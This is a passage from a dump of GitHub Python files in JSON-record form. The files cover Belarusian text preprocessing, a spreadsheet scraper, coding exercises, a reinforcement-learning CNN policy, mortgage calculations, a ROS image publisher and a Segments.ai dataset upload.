word_map.update(adj1)\n word_map.update(adj2)\n\n manual_word_map = {\n 'расеі': word_map['расіі'],\n 'расея': 'расія',\n 'расею': word_map['расію'],\n 'расеяй': word_map['расіяй'],\n 'ссср': 'ссср',\n 'бсср': 'бсср',\n 'бнр': 'бнр',\n 'вкл': 'вкл',\n 'смі': 'смі',\n 'шоў': 'шоў',\n 'тыс': 'тысяча',\n 'млн': 'мільён',\n 'вул': 'вуліца',\n 'вобл': 'вобласць',\n 'тэл': 'тэлефон',\n 'км': word_map['кіламетр'],\n 'навінаў': word_map['навін'],\n 'тысячаў': word_map['тысяч'],\n 'прэзыдэнта': word_map['прэзідэнта'],\n 'прэзыдэнт': word_map['прэзідэнт'],\n 'камэнтары': word_map['каментары'],\n 'сыстэму': word_map['сістэму'],\n 'сытуацыі': word_map['сітуацыі'],\n 'сытуацыя': word_map['сітуацыя'],\n 'цэнтар': word_map['цэнтр'],\n 'вільня': word_map['вільнюс'],\n 'вільню': word_map['вільнюс'],\n 'сьмерці': word_map['смерці'],\n 'грамадзтва': word_map['грамадства'],\n 'эўропы': word_map['еўропы'],\n 'сябраў': word_map['сяброў'],\n 'апазыцыі': word_map['апазіцыі'],\n 'міністар': word_map[\"міністр\"],\n 'мэню': word_map[\"меню\"],\n 'інтэрвію': word_map[\"інтэрв'ю\"],\n 'газэты': word_map[\"газеты\"],\n 'дакумэнты': word_map[\"дакументы\"],\n 'сытуацыю': word_map[\"сітуацыю\"],\n 'разьдзел': word_map[\"раздзел\"],\n 'сьмерць': word_map[\"смерць\"],\n 'калёніі': word_map[\"калоніі\"],\n 'газэта': word_map[\"газета\"],\n }\n word_map.update(manual_word_map)\n\n if adjectives:\n manual_word_map = {\n 'спэцыяльныя': word_map[\"спецыяльныя\"],\n 'грамадзкі': word_map[\"грамадскі\"]\n }\n word_map.update(manual_word_map)\n\n with open(filename, 'w') as f:\n json.dump(word_map, f, ensure_ascii=False, indent=0, sort_keys=True)\n\n\ndef strip_trailing_newline(iterable):\n for i in iterable:\n yield i.rstrip()\n\n\n# this function is based on gensim.parser.preprocessing.strip_punctuation\n# we replace gensim's version to correctly handle symbol ' in words, such as п'еса or кар'ера\nRE_PUNCTUATION = re.compile(r'([%s])+' % re.escape(string.punctuation.replace(\"'\",\"\")), re.UNICODE)\ndef strip_punctuation(s):\n s = utils.to_unicode(s)\n return RE_PUNCTUATION.sub(\" \", s)\n\n\nCHARACTERS_MAP = {'’': '\\'', 'ý': 'ў', ' ў': ' у', 'i': 'і', 'ньн': 'нн', 'цьц': 'цц', 'сьц': 'сц', 'сьл':'сл', 'дзьдз': 'ддз', 'сьв': 'св', 'зьв': 'зв', 'сьп': 'сп', 'сьс': 'сс', 'сьн': 'сн', 'разьм': 'разм', 'зьмен': 'змен', 'зьмес': 'змес', 'зьмяс': 'змяс', 'зьмян': 'змян', 'зьн': 'зн', 'зьл': 'зл'}\ndef lower_and_replace_characters(iterable):\n for s in iterable:\n s = s.lower()\n for k, v in CHARACTERS_MAP.items():\n s = s.replace(k, v)\n yield s\n\n\ndef split_sentences(iterable):\n for i in iterable:\n merged_dots = re.sub(\"[\\.]+\", \".\", i)\n sentences = merged_dots.split('.')\n for s in sentences:\n yield s\n\n\ndef process_and_filter_word(raw_words, word_map):\n valid_words = []\n removed_words = []\n for w in raw_words:\n w = w.strip(\"'\")\n if w in word_map:\n valid_words.append(word_map[w])\n else:\n removed_words.append(w)\n return valid_words, removed_words\n\n\ndef preprocess_sentences(iterable, derived_form_blacklist, word_map, removed_words_accumulator: list):\n for i in iterable:\n s = strip_multiple_whitespaces(strip_numeric(strip_short(strip_punctuation(i))))\n s = re.sub(\"[«»“”„…—°′²]\", \"\", s)\n s = remove_stopwords(s, stopwords=derived_form_blacklist)\n valid_words, removed_words = process_and_filter_word(s.split(), word_map)\n s = ' '.join(valid_words)\n removed_words_accumulator.extend(removed_words)\n yield s\n\n\ndef remove_short_lines(iterable):\n for i in iterable:\n if not i.isspace() and len(i) >= 20:\n yield i\n\n\ndef process_corpus(word_map_filename, processed_filename, removed_words_filename, split_sent):\n with open(word_map_filename) as f:\n word_map = json.load(f)\n\n with open('be.txt', 'r') as original_file:\n with open(processed_filename, 'w') as sentences_file:\n with open(removed_words_filename, 'w') as removed_words_file:\n removed_words = []\n lines = strip_trailing_newline(original_file)\n lines = lower_and_replace_characters(lines)\n if split_sent:\n lines = split_sentences(lines)\n lines = preprocess_sentences(lines, DERIVED_FORM_BLACKLIST, word_map, removed_words)\n lines = remove_short_lines(lines)\n for s in lines:\n sentences_file.write(s + \"\\n\")\n removed_words_file.write(' '.join(removed_words) + \"\\n\")\n removed_words.clear()\n\n\ndef run_preprocessing(word_mapping_filename,\n processed_filename,\n removed_words_filename,\n verbs,\n adjectives,\n split_sent):\n\n if exists_nonempty_file(word_mapping_filename) and \\\n exists_nonempty_file(processed_filename) and \\\n exists_nonempty_file(removed_words_filename):\n logger.info(f'Corpus already preprocessed for mapping \"{word_mapping_filename}\", '\n f'processed corpus \"{processed_filename}\" and removed words \"{removed_words_filename}\"')\n return\n else:\n logger.info(f'Processing corpus for mapping \"{word_mapping_filename}\", '\n f'processed corpus \"{processed_filename}\" and removed words \"{removed_words_filename}\"')\n\n if not corpus_downloaded():\n download_corpus()\n\n if not grammar_downloaded():\n download_grammar()\n\n if not exists_nonempty_file(word_mapping_filename):\n generate_word_mapping(word_mapping_filename, verbs, adjectives)\n process_corpus(word_mapping_filename, processed_filename, removed_words_filename, split_sent)\n\n\nif __name__ == \"__main__\":\n run_preprocessing(word_mapping_filename='word-map.json',\n processed_filename='processed-corpus.txt',\n removed_words_filename='removed-words.txt',\n verbs=True,\n adjectives=True,\n split_sent=True)\n run_preprocessing(word_mapping_filename='word-map-only-nouns.json',\n processed_filename='processed-corpus-only-nouns.txt',\n removed_words_filename='removed-words-only-nouns.txt',\n verbs=False,\n adjectives=False,\n split_sent=True)\n run_preprocessing(word_mapping_filename='word-map.json',\n processed_filename='processed-corpus-no-sent-split.txt',\n removed_words_filename='removed-words-no-sent-split.txt',\n verbs=True,\n adjectives=True,\n split_sent=False)\n\n","repo_name":"pikazlou/belarusian-word-embedding","sub_path":"preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":12660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"5535284787","text":"#!/usr/bin/python\n\n#I have this script checking that s&t spreadsheet every minute, and logging when/how it changes so we can test its true accuracy\n\nfrom datetime import datetime\nimport requests\n\nresponse = requests.get('https://docs.google.com/spreadsheets/d/1A0s8AJ8pLgPt929itg61E4SkB0HlZg8ofgiMyLZtbo8/edit?usp%5Cu003ddrive_web%5Cu0026amp;headers%5Cu003d1#gid=0&range=B11')\nassert response.status_code == 200, 'Wrong status code'\n\nraw = str(response.content)\nstart = raw.find(\"Fitness Center\") + 15\ncurrent = \"\"\n\nwhile raw[start].isdigit():\n current += raw[start]\n start += 1\n\nnow = datetime.now()\ncurrent_time = now.strftime(\"%D:%H:%M:%S\")\n\npath_to_log = \"/home/mitchhit234/git/JIMSS/Mitch/log.txt\"\n\nwith open(path_to_log, \"r\") as g:\n first_line = g.readline()\n for last_line in g:\n pass\n\ni = 0\nmatch = \"\"\nwhile last_line[i].isdigit():\n match += last_line[i]\n i += 1\n\nif match != current:\n f = open(path_to_log, \"a\")\n f.write(current + \", Time = \" + current_time + '\\n')\n f.close()\n","repo_name":"DavidShelbs/JIMSS","sub_path":"Mitch/scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"38868513937","text":"people = {\n\t'first_name': 'Han',\n\t'last_name': 'jinglong',\n\t'age': 18,\n\t'city': 'beijing',\n\n}\n\n# print(people['first_name'])\n\n# print(people['last_name'])\n\n# print(str( people['age']) )\n\n# print(people['city'])\n\nfor people_key, people_value in people.items():\n\tprint(\"people_key: \" + people_key)\n\tif isinstance(people_value, int):\n\t\tprint(\"people_value: \" +str(people_value))\n\telse:\n\t\tprint(\"people_value: \" + people_value)\n# print(type(people['age']))\n\npeople['jiji'] = 'big jiji'\n\nprint(people)\n\ndel people['jiji']\n\nprint(people) \n\n\nuser_o = {\n\t'username' :'efermi',\n\t'first' : 'enrico',\n\t'last' :'fermi',\n\n}\n\nfor k, v in user_o.items():\n\tprint(\"key \"+ k)\n\tprint(\"value \"+ v)\n\n\nrivers ={\n\t'nile':'egypt',\n\t'haunghe':'china',\n\t'long river':'china',\n\n}\n\nfor river, nation in rivers.items():\n\tprint(\"The \" + river.title() + \"runs through \"+ nation.title())\n\nfor river in rivers.keys():\n\tprint(river)\n\nfor nation in sorted(rivers.values()):\n\tprint(nation)\n","repo_name":"wenzhifeifeidetutu/pythonWork","sub_path":"pythonCrashcourseExerciseAnswer/p_87.py","file_name":"p_87.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"40361759842","text":"# 【最长不含重复字符的子字符串】\n# 请从字符串中找出一个最长的不包含重复字符的子字符串,计算该最长子字符串的长度。\n# 输入: \"pwwkew\"\n# 输出: 3\n\ndef lengthOfLongestSubstring(s):\n if s == \"\":\n return 0\n sLength = len(s)\n # 对于每个位置都维持两个数据:\n # 第一,到目前位置为止最长的目标字符串的长度;\n # 第二,一个子字符串的长度,该子字符串从某一位到字符串末尾,且不含重复字符,最长\n dpResult = dict()\n # 遍历字符串的每一位\n for index in range(sLength):\n thisChar = s[index]\n if index == 0:\n maxLength = 1\n rearFirstIndex = 0\n else:\n lastMaxLength = dpResult[index-1][0]\n lastRearFirstIndex = dpResult[index-1][1]\n rearSubStr = s[lastRearFirstIndex:index]\n if thisChar in rearSubStr:\n rearFirstIndex = lastRearFirstIndex + rearSubStr.index(thisChar) + 1\n else:\n rearFirstIndex = lastRearFirstIndex\n maxLength = lastMaxLength if lastMaxLength >= (index-rearFirstIndex+1) else (index-rearFirstIndex+1)\n dpResult[index] = [maxLength, rearFirstIndex]\n return dpResult[sLength-1][0]\n\nprint(lengthOfLongestSubstring(\"pwwkew\"))","repo_name":"LobbyBoy-Dray/Leetcode-Problem-Set","sub_path":"code/2020-06-16-中等-最长不含重复字符地子字符串.py","file_name":"2020-06-16-中等-最长不含重复字符地子字符串.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"34035813341","text":"\"\"\"Discrete CNN Policy.\"\"\"\nimport torch\nfrom torch import nn\n\nfrom garage import InOutSpec\nfrom garage.torch.modules import DiscreteCNNModule\nfrom garage.torch.policies.stochastic_policy import StochasticPolicy\n\n\nclass DiscreteCNNPolicy(StochasticPolicy):\n \"\"\"DiscreteCNNPolicy.\n\n A policy that contains a CNN and a MLP to make prediction based on\n a discrete distribution.\n\n Args:\n env_spec (EnvSpec): Environment specification.\n image_format (str): Either 'NCHW' or 'NHWC'. Should match env_spec. Gym\n uses NHWC by default, but PyTorch uses NCHW by default.\n kernel_sizes (tuple[int]): Dimension of the conv filters.\n For example, (3, 5) means there are two convolutional layers.\n The filter for first layer is of dimension (3 x 3)\n and the second one is of dimension (5 x 5).\n strides (tuple[int]): The stride of the sliding window. For example,\n (1, 2) means there are two convolutional layers. The stride of the\n filter for first layer is 1 and that of the second layer is 2.\n hidden_channels (tuple[int]): Number of output channels for CNN.\n For example, (3, 32) means there are two convolutional layers.\n The filter for the first conv layer outputs 3 channels\n hidden_sizes (list[int]): Output dimension of dense layer(s) for\n the MLP for mean. For example, (32, 32) means the MLP consists\n of two hidden layers, each with 32 hidden units.\n mlp_hidden_nonlinearity (callable): Activation function for\n intermediate dense layer(s) in the MLP. It should return\n a torch.Tensor. Set it to None to maintain a linear activation.\n cnn_hidden_nonlinearity (callable): Activation function for\n intermediate CNN layer(s). It should return a torch.Tensor.\n Set it to None to maintain a linear activation.\n hidden_w_init (callable): Initializer function for the weight\n of intermediate dense layer(s). The function should return a\n torch.Tensor.\n hidden_b_init (callable): Initializer function for the bias\n of intermediate dense layer(s). The function should return a\n torch.Tensor.\n paddings (tuple[int]): Zero-padding added to both sides of the input\n padding_mode (str): The type of padding algorithm to use,\n either 'SAME' or 'VALID'.\n max_pool (bool): Bool for using max-pooling or not.\n pool_shape (tuple[int]): Dimension of the pooling layer(s). For\n example, (2, 2) means that all the pooling layers have\n shape (2, 2).\n pool_stride (tuple[int]): The strides of the pooling layer(s). For\n example, (2, 2) means that all the pooling layers have\n strides (2, 2).\n output_nonlinearity (callable): Activation function for output dense\n layer. It should return a torch.Tensor. Set it to None to\n maintain a linear activation.\n output_w_init (callable): Initializer function for the weight\n of output dense layer(s). The function should return a\n torch.Tensor.\n output_b_init (callable): Initializer function for the bias\n of output dense layer(s). The function should return a\n torch.Tensor.\n layer_normalization (bool): Bool for using layer normalization or not.\n name (str): Name of policy.\n\n \"\"\"\n\n def __init__(self,\n env_spec,\n image_format,\n kernel_sizes,\n hidden_channels,\n strides,\n hidden_sizes=(32, 32),\n cnn_hidden_nonlinearity=torch.nn.ReLU,\n mlp_hidden_nonlinearity=torch.nn.ReLU,\n hidden_w_init=nn.init.xavier_uniform_,\n hidden_b_init=nn.init.zeros_,\n paddings=0,\n padding_mode='zeros',\n max_pool=False,\n pool_shape=None,\n pool_stride=1,\n output_nonlinearity=None,\n output_w_init=nn.init.xavier_uniform_,\n output_b_init=nn.init.zeros_,\n layer_normalization=False,\n name='DiscreteCNNPolicy'):\n\n super().__init__(env_spec, name)\n\n self._cnn_module = DiscreteCNNModule(\n spec=InOutSpec(input_space=env_spec.observation_space,\n output_space=env_spec.action_space),\n image_format=image_format,\n kernel_sizes=kernel_sizes,\n hidden_channels=hidden_channels,\n strides=strides,\n hidden_sizes=hidden_sizes,\n cnn_hidden_nonlinearity=cnn_hidden_nonlinearity,\n mlp_hidden_nonlinearity=mlp_hidden_nonlinearity,\n hidden_w_init=hidden_w_init,\n hidden_b_init=hidden_b_init,\n paddings=paddings,\n padding_mode=padding_mode,\n max_pool=max_pool,\n pool_shape=pool_shape,\n pool_stride=pool_stride,\n output_nonlinearity=output_nonlinearity,\n output_w_init=output_w_init,\n output_b_init=output_b_init,\n layer_normalization=layer_normalization)\n\n def forward(self, observations):\n \"\"\"Compute the action distributions from the observations.\n\n Args:\n observations(torch.Tensor): Batch of observations of shape\n :math:`(N, O)`. Observations should be flattened even\n if they are images as the underlying Q network handles\n unflattening.\n\n Returns:\n torch.distributions.Distribution: Batch distribution of actions.\n dict[str, torch.Tensor]: Additional agent_info, as torch Tensors.\n Do not need to be detached, and can be on any device.\n \"\"\"\n # We're given flattened observations.\n observations = observations.reshape(\n -1, *self._env_spec.observation_space.shape)\n output = self._cnn_module(observations)\n logits = torch.softmax(output, axis=1)\n dist = torch.distributions.Bernoulli(logits=logits)\n return dist, {}\n","repo_name":"rlworkgroup/garage","sub_path":"src/garage/torch/policies/discrete_cnn_policy.py","file_name":"discrete_cnn_policy.py","file_ext":"py","file_size_in_byte":6223,"program_lang":"python","lang":"en","doc_type":"code","stars":1748,"dataset":"github-code","pt":"73"} +{"seq_id":"19881568577","text":"import os\r\n\r\ndef test():\r\n os.system('cd /usr/local')\r\n os.mkdir('tmy')\r\n\r\n libs = {\"numpy\", \"matplotlib\", \"pandas\"}\r\n try:\r\n for lib in libs:\r\n os.system(\"pip install \" + lib)\r\n print(\"Successful\")\r\n except:\r\n print(\"Failed Somehow\")\r\ntest()\r\n\r\n\r\n\r\n\r\n","repo_name":"wanghan79/2020_Option_System","sub_path":"陶梦瑶2018012691/操作系统实验/平时作业2.py","file_name":"平时作业2.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"73"} +{"seq_id":"18021126925","text":"from nacl.signing import VerifyKey\nfrom nacl.encoding import HexEncoder\nimport binascii\nimport os\n\n\ndef verify_signature(signature, message):\n verify_key_hex = os.environ[\"VERIFY_KEY\"]\n key_bytes = binascii.unhexlify(verify_key_hex)\n verify_key = VerifyKey(key_bytes)\n try:\n verify_key.verify(signature.encode(), encoder=HexEncoder)\n signature_body = binascii.unhexlify(signature)\n if signature_body[(-1*len(message)):].decode() != message:\n return False\n except Exception as e:\n print(str(e))\n return False\n return True\n","repo_name":"m-motawea/tf-lb","sub_path":"services/api/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"73"} +{"seq_id":"73601383596","text":"\"\"\"This is the logic file for the mortgage calculator functions\"\"\"\n\nimport altair as alt\nimport pandas as pd\nimport numpy as np\nimport numpy_financial as npf\n\n\ndef get_rates():\n \"\"\"Gets the daily mortgage rates from Bankrate\n\n Returns:\n rate_data (DataFrame): A DataFrame of the daily mortgage rates\"\"\"\n\n # getthe rates\n rate_data = pd.read_html(\n \"https://www.bankrate.com/mortgages/mortgage-rates/#mortgage-industry-insights\"\n )\n rate_data = rate_data[1]\n\n # rename the columns to Program, Rate, APR, Change\n rate_data.columns = [\"Product\", \"Rate\", \"APR\"]\n\n # drop nas\n rate_data.dropna(inplace=True)\n\n # make a column with the rate as a float\n rate_data[\"Rate_flt\"] = rate_data[\"Rate\"].astype(str)\n\n # drop the % from the rate column\n rate_data[\"Rate_flt\"] = rate_data[\"Rate_flt\"].str.replace(\"%\", \"\")\n\n # convert the rate column to a float\n rate_data[\"Rate_flt\"] = rate_data[\"Rate_flt\"].astype(float)\n\n # make a column with the APR as a float\n rate_data[\"APR_flt\"] = rate_data[\"APR\"].astype(str)\n\n # drop the % from the rate column\n rate_data[\"APR_flt\"] = rate_data[\"APR_flt\"].str.replace(\"%\", \"\")\n\n # convert the rate column to a float\n rate_data[\"APR_flt\"] = rate_data[\"APR_flt\"].astype(float)\n\n # make a years column with first two characters from product\n rate_data[\"Years\"] = rate_data[\"Product\"].str[:2]\n\n return rate_data\n\n\ndef max_cost(max_pay, max_down, max_rate, term):\n \"\"\"This function calculates the maximum purchase price.\n\n Args:\n max_pay (int): The maximum monthly payment.\n max_down (int): The maximum down payment.\n max_rate (float): The maximum interest rate.\n term (int): The term of the mortgage in years.\n\n Returns:\n max_total (int): The maximum purchase price.\n \"\"\"\n\n # Calculate the maximum purchase price using pv\n max_price = npf.pv(max_rate / 100 / 12, term * 12, max_pay, when=\"begin\")\n\n # Calculate the maximum principal\n max_total = max_price - max_down\n\n return abs(max_total)\n\n\ndef mortgage_cost(principal, rate, term):\n \"\"\"This function calculates the cost of a mortgage.\n\n Args:\n principal (int): The principal of the mortgage.\n rate (float): The interest rate of the mortgage.\n term (int): The term of the mortgage in years.\n\n Returns:\n payment (float): The monthly payment.\n \"\"\"\n\n # Calculate the monthly payment\n monthly_rate = rate / 100 / 12\n payments = term * 12\n payment = (\n principal\n * (monthly_rate * (1 + monthly_rate) ** payments)\n / ((1 + monthly_rate) ** payments - 1)\n )\n\n # Calculate the total cost of the mortgage\n total_cost = payment * payments\n\n # Calculate the total interest paid\n interest_paid = total_cost - principal\n\n return payment, total_cost, interest_paid\n\n\ndef rate_price_matrix(int_rate, pay_price, down_payment):\n \"\"\"This function builds a matrix of affordability.\n\n Args:\n int_rate (float): The interest rate of the mortgage.\n pay_price (int): The purchase price of the home.\n down_payment (int): The down payment of the mortgage.\n\n Returns:\n rate_price_matrix (DataFrame): A DataFrame of the affordability matrix.\"\"\"\n\n # generate a list of sale prices with the pay_price as the center\n price_minus = pay_price - (pay_price * 0.25)\n price_plus = pay_price + (pay_price * 0.25)\n price_list = [\n x for x in range(int(price_minus), int(price_plus), int(pay_price * 0.05))\n ]\n\n # round price_list to the nearst 1000\n price_list = [round(x, -3) for x in price_list]\n\n # generate a list of interest rates with the int_rate as the center\n rate_list = [x for x in range(200, 1100, 50)]\n rate_list = [x / 100 for x in rate_list]\n\n # add the int_rate to the list and sort the list\n rate_list.append(int_rate)\n rate_list = sorted(rate_list)\n\n # filter the table for int_rate +/- 2\n rate_list = [x for x in rate_list if x >= int_rate - 2 and x <= int_rate + 2]\n\n # create a dataframe from the rate_list and price_list\n rp_matrix = pd.DataFrame(columns=rate_list, index=price_list)\n\n # # populate the dataframe with the payment values\n for rate in rate_list:\n for price in price_list:\n rp_matrix.loc[price, rate] = mortgage_cost(price - down_payment, rate, 30)[\n 0\n ]\n\n # # convert all values to integers\n rp_matrix = rp_matrix.astype(int)\n\n # # format the index to appear as dollar amounts\n rp_matrix.index = rp_matrix.index.map(\"${:,.0f}\".format)\n\n # # format the values to appear as dollar amounts\n rp_matrix = rp_matrix.applymap(\"${:,.0f}\".format)\n\n return rp_matrix\n\n\ndef cost_plot(max_list, rate_df):\n \"\"\"This shows a bar chart of the total cost of the mortgage for different year options\n\n Args:\n max_list (list): A list of the maximum monthly payment, down payment, and interest rate.\n rate_df (DataFrame): A DataFrame of the interest rates and APRs.\n\n Returns:\n chart (altair.Chart): A bar chart of the total cost of the mortgage for different year options.\n \"\"\"\n\n # make a copy of the rate_df\n rate_df = rate_df.copy()\n\n # add the total cost of the mortgage to the rate_df\n rate_df[\"Total Cost\"] = rate_df[\"Rate_flt\"].apply(\n lambda x: mortgage_cost(max_list, x, 30)[1]\n )\n\n # keep the top four rows and sort by Total Cost\n rate_df = rate_df.sort_values(by=\"Total Cost\").head(11)\n\n # Create the chart\n chart = (\n alt.Chart(rate_df)\n .mark_bar()\n .encode(\n x=alt.X(\"Years:Q\", title=\"Length of Mortgage\", scale=alt.Scale(zero=False)),\n y=alt.Y(\n \"Total Cost:Q\",\n title=\"Total Cost of Mortgage\",\n scale=alt.Scale(zero=False),\n ),\n )\n )\n\n return chart\n\n\ndef heat_map(r_p_matrix):\n \"\"\"This shows a heat map of the total cost of the mortgage for different options\"\"\"\n\n r_p_matrix = r_p_matrix.copy()\n\n # convert the values to floats\n r_p_matrix = r_p_matrix.applymap(\n lambda x: float(x.replace(\"$\", \"\").replace(\",\", \"\"))\n )\n\n # convert the index to floats\n r_p_matrix.index = r_p_matrix.index.map(\n lambda x: float(x.replace(\"$\", \"\").replace(\",\", \"\"))\n )\n\n # extract the index and columns from the r_p_matrix\n x_ind = r_p_matrix.columns\n y_col = r_p_matrix.index\n\n z = r_p_matrix.values\n\n z_med = np.median(z)\n\n x, y = np.meshgrid(x_ind, y_col)\n\n # Convert this grid to columnar data expected by Altair\n source = pd.DataFrame({\"Rate\": x.ravel(), \"Price\": y.ravel(), \"Payment\": z.ravel()})\n\n heat_base = alt.Chart(source).encode(alt.Y(\"Price:O\"), alt.X(\"Rate:O\"))\n\n heat_colors = heat_base.mark_rect().encode(alt.Color(\"Payment:Q\"))\n\n heat_text = heat_base.mark_text(baseline=\"middle\").encode(\n alt.Text(\"Payment:Q\", format=\".0f\"),\n color=alt.condition(\n alt.datum.Payment < z_med, alt.value(\"black\"), alt.value(\"white\")\n ),\n )\n\n heat_chart = heat_colors + heat_text\n\n return heat_chart\n","repo_name":"andrewkroening/fun-money-tools","sub_path":"logic/mort_logic.py","file_name":"mort_logic.py","file_ext":"py","file_size_in_byte":7150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"34738557019","text":"# Import the necessary modules, such as pandas, numpy, sklearn, matplotlib, seaborn, etc.\r\nimport pandas as pd\r\nimport numpy as np\r\nimport sklearn.cluster as cluster\r\nimport sklearn.metrics as metrics\r\nimport sklearn.preprocessing as preprocessing\r\nimport sklearn.decomposition as decomposition\r\nimport sklearn.neighbors as neighbors\r\nimport sklearn.model_selection as model_selection\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nfrom mlxtend.frequent_patterns import apriori, association_rules\r\n\r\n# Define a function to read the data from a CSV file and store it in a pandas dataframe.\r\ndef read_data(file_name):\r\n # Read the CSV file using pandas\r\n df = pd.read_csv(file_name)\r\n # Return the dataframe\r\n return df\r\n\r\n# Define a function to preprocess the data, such as handling missing values, outliers, duplicates, etc.\r\ndef preprocess_data(df):\r\n # Drop any rows with missing values\r\n df = df.dropna()\r\n # Remove any rows with invalid values for user_id or ad_id\r\n df = df[(df['user_id'].apply(lambda x: x.isnumeric())) & (df['ad_id'].apply(lambda x: x.isnumeric()))]\r\n # Convert user_id and ad_id to integer type\r\n df['user_id'] = df['user_id'].astype(int)\r\n df['ad_id'] = df['ad_id'].astype(int)\r\n # Remove any duplicates based on user_id and ad_id\r\n df = df.drop_duplicates(subset=['user_id', 'ad_id'])\r\n # Return the cleaned dataframe\r\n return df\r\n\r\n# Define a function to perform exploratory data analysis (EDA), such as calculating summary statistics, visualizing distributions, correlations, etc.\r\ndef perform_eda(df):\r\n # Calculate the summary statistics for the numeric variables\r\n print(df.describe())\r\n \r\n # Calculate the frequency counts for the categorical variables\r\n print(df['device'].value_counts())\r\n print(df['browser'].value_counts())\r\n \r\n # Visualize the distribution of the numeric variables using histograms\r\n df.hist(figsize=(10, 10))\r\n plt.show()\r\n \r\n # Visualize the relationship between the categorical variables using bar charts\r\n sns.countplot(x='device', hue='browser', data=df)\r\n plt.show()\r\n \r\n# Define a function to define user engagement metrics, such as impressions, clicks, conversions, bounce rate, dwell time, etc.\r\ndef define_engagement_metrics(df):\r\n # Define impressions as the number of times an ad was shown to a user\r\n impressions = df.groupby(['user_id', 'ad_id'])['timestamp'].count()\r\n \r\n # Define clicks as the number of times an ad was clicked by a user\r\n clicks = df.groupby(['user_id', 'ad_id'])['clicked'].sum()\r\n \r\n # Define conversions as the number of times an ad led to a purchase by a user\r\n conversions = df.groupby(['user_id', 'ad_id'])['purchased'].sum()\r\n \r\n # Define bounce rate as the percentage of users who left the website after viewing an ad without clicking or purchasing\r\n bounce_rate = (df[(df['clicked'] == 0) & (df['purchased'] == 0)].groupby(['user_id', 'ad_id'])['timestamp'].count() / impressions) * 100\r\n \r\n # Define dwell time as the average time spent by a user on the website after viewing an ad\r\n dwell_time = df.groupby(['user_id', 'ad_id'])['duration'].mean()\r\n \r\n # Return a dictionary of engagement metrics\r\n engagement_metrics = {'impressions': impressions,\r\n 'clicks': clicks,\r\n 'conversions': conversions,\r\n 'bounce_rate': bounce_rate,\r\n 'dwell_time': dwell_time}\r\n \r\n return engagement_metrics\r\n","repo_name":"Kotyara2011/aifunctions","sub_path":"18/user_engagement_analytics.py","file_name":"user_engagement_analytics.py","file_ext":"py","file_size_in_byte":3546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"33339794679","text":"\"\"\"\nA non-empty array A consisting of N integers is given.\nThe array contains an odd number of elements, and each\nelement of the array can be paired with another element\nthat has the same value, except for one element that is\nleft unpaired.\n\"\"\"\nimport cProfile\nfrom math import ceil\n\n\ndef get_unpaired(A):\n value_set = set()\n for elem in A:\n if elem in value_set:\n value_set.remove(elem)\n else:\n value_set.add(elem)\n return value_set.pop()\n\n\nassert get_unpaired([9,3,9]) == 3\n\n\ndef solution(X, Y, D):\n return ceil((Y-X)/D)\n\n\nprint(solution(1, 100, 1))\n","repo_name":"miloradbozic/99_days_of_python_challange","sub_path":"day_6.py","file_name":"day_6.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"17688072643","text":"import sys\n\nros_path = '/opt/ros/kinetic/lib/python2.7/dist-packages'\n\nif ros_path in sys.path:\n print(\"removed ros_path\")\n sys.path.remove(ros_path)\n\nimport cv2\nsys.path.append('/opt/ros/kinetic/lib/python2.7/dist-packages')\nsys.path.append(\"/usr/lib/python2.7/dist-packages\")\nimport rospy\nfrom cv_bridge import CvBridge\nfrom sensor_msgs.msg import Image\n\n\nimport time\nimport os\nrospy.init_node(\"ddd\")\n\n\nprint(\"load kitti test images\")\nimage_path = \"/home/chan/dataset-color/sequences/00/image_2\"\nimg_list = sorted(os.listdir(image_path))\n# test_img = test_img[0:372, 0:1240]\npub = rospy.Publisher(\"image\", Image, queue_size=10)\nb = CvBridge()\nidx = 0\nwhile idx != len(img_list):\n\n print(os.path.join(image_path, img_list[idx]))\n test_img = cv2.imread(os.path.join(image_path, img_list[idx]))\n test_img = test_img[0:372, 0:1240]\n cv2.imshow(\"rgb\", test_img)\n cv2.waitKey(1)\n # test_img = cv2.cvtColor(test_img, cv2.COLOR_BGR2GRAY)\n msg = b.cv2_to_imgmsg(test_img, encoding=\"passthrough\")\n #print(msg.encoding)\n pub.publish(msg)\n idx += 1\n time.sleep(0.1)\n\n","repo_name":"AhnDroiid/RGB-Deep-SLAM","sub_path":"test_publisher.py","file_name":"test_publisher.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"72286599276","text":"# Segments.ai upload 'Scott Base 2021-22' dataset\n\nfrom os import environ, listdir\n\nfrom segments import SegmentsClient\nfrom tqdm import tqdm\n\napi_key = environ.get(\"SegmentsAI_api_key\")\ndataset = \"segmentsai1/Seal_2022-22\"\n\nclient = SegmentsClient(api_key)\npath = \"/home/fdi19/SENG402/data/images/scott_base/2021-22\"\n\nfor filename in tqdm(listdir(path)[8775:]):\n name = filename.split('.')[0]\n\n with open(f\"{path}/{filename}\", \"rb\") as f:\n asset = client.upload_asset(f, filename=filename)\n\n attributes = {\"image\": {\"url\": asset[\"url\"]}}\n client.add_sample(dataset, name, 